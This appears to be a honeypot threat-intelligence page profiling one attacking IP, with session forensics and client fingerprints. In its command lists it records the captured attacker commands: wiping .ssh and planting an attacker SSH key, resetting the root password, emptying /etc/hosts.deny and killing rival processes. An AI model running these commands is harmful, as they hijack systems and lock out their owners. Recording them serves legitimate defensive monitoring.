← Back to feed
14.103.74.80
Location
🇨🇳 CN
ASN
AS4811 · China Telecom Group
Cloud Provider
—
Total Events
22
Average by volume
Agent Count
1
First / Last Seen
2026-03-09 06:54 — 2026-04-09 14:32
Attack Types
MITRE ATT&CK Techniques
Initial Access
Defense Evasion
Command and Control
External Corroboration
Not flagged by any external feeds
Campaigns
Not associated with any campaigns
Session Forensics
Sessions
24 (4 with login)
Avg Depth Score
0.26
Commands Executed
26
Files Downloaded
3
Notable Commands
- cd ~; chattr -ia .ssh; lockr -ia .ssh
- lockr -ia .ssh
- cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
- cat /proc/cpuinfo | grep name | wc -l
- echo "root:bo7iU4catKOs"|chpasswd|bash
- rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;
- cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
- free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
- ls -lh $(which ls)
- which ls
Fingerprints
HASSH
SSH Client
Evidence Timeline
Scanner
8a997542781f
15%
Loading events...
Scanner
1c3c57483d2e
15%
Loading events...
Scanner
6bdf569329a3
15%
Loading events...
Scanner
f653b8624e0d
15%
Loading events...
SSH-2.0-libssh_0.11.1
Opportunistic Bruter
070b4b3ca343
LOGIN
1
50%
Loading events...
HASSH 03a80b21afa8106…
SSH-2.0-libssh_0.11.1
Malware Dropper
4053dd035615
LOGIN
3
1
1
100%
Loading events...
HASSH 03a80b21afa8106…
SSH-2.0-libssh_0.11.1
$ cd ~; chattr -ia .ssh; lockr -ia .ssh$ lockr -ia .ssh$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3Nz…
Malware Dropper
a93a944d2b2e
LOGIN
20
2
1
100%
Loading events...
HASSH 03a80b21afa8106…
SSH-2.0-libssh_0.11.1
$ cd ~; chattr -ia .ssh; lockr -ia .ssh$ lockr -ia .ssh$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3Nz…$ cat /proc/cpuinfo | grep name | wc -l$ echo "root:bo7iU4catKOs"|chpasswd|bash
Scanner
43aed3b472e0
15%
Loading events...
Scanner
a13e4d49c41f
15%
Loading events...
Scanner
a226618a6043
15%
Loading events...
Scanner
4af6960c9015
15%
Loading events...
SSH-2.0-libssh_0.11.1
Scanner
736380e80b8c
15%
Loading events...
Scanner
85b0d3db7043
15%
Loading events...
Scanner
3b6e79d80e60
15%
Loading events...
SSH-2.0-libssh_0.11.1
Scanner
2c358227ad24
15%
Loading events...
Scanner
d0d77065cb0f
15%
Loading events...
Scanner
f47f6225e82d
15%
Loading events...
Reconnaissance
53915b7254fb
LOGIN
3
1
60%
Loading events...
HASSH 03a80b21afa8106…
SSH-2.0-libssh_0.11.1
$ cd ~; chattr -ia .ssh; lockr -ia .ssh$ lockr -ia .ssh$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3Nz…
Scanner
d08bc5305541
15%
Loading events...